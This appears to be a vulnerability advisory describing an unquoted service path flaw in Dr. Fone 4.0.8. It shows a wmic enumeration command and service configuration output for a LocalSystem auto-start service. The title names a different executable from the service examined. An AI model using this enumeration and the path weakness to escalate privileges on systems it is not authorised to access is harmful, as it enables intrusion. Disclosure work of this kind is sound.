# Exploit Title: Dr. Fone v4.0.8- 'net_updater32.exe' Unquoted Service Path # Discovery Date: 2022-05-07 # Discovery by: Esant1490 # Vendor Homepage: https://drfone.wondershare.net # Software Link : https://download.wondershare.net/drfone_full4008.exe # Tested Version: 4.0.8 # Tested on OS: Windows 10 Pro x64 en # Vulnerability Type: Unquoted Service Path # Find the discover Unquoted Service Path Vulnerability: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ Wondershare Install Assist Service Wondershare InstallAssist C:\ProgramData\Wondershare\Service\InstallAssistService.exe Auto Wondershare Application Framework Service WsAppService C:\Program Files (x86)\Wondershare\WAF\2.4.3.243\WsAppService.exe Auto Wondershare Application Update Service 3.0 WsAppService3 C:\Program Files (x86)\Wondershare\WAF3\3.0.0.308\WsAppService3.exe Auto Wondershare Driver Install Service WsDrvInst C:\Program Files (x86)\Wondershare\drfone\Addins\Unlock\DriverInstall.exe Auto # Service info: C:\>sc qc WsDrvInst [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: WsDrvInst TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Wondershare\drfone\Addins\Unlock\DriverInstall.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Wondershare Driver Install Service DEPENDENCIAS : RPCSS NOMBRE_INICIO_SERVICIO: LocalSystem #Exploit: A successful attempt to exploit this vulnerability could allow to execute code during startup or reboot with the elevated privileges.